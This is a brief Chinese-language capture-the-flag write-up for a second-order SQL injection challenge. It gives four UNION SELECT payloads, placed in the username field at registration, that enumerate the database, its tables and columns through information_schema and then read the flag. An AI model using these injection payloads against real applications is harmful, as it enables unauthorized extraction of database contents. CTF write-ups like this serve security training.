根据题目可以知道这是一个二次注入题
注册时把我们sql语句放到username处,登录后即可看到我们想要的信息
payload为:
username =1' union select database() #
username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #
username =1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
username =1' union select flag from flag #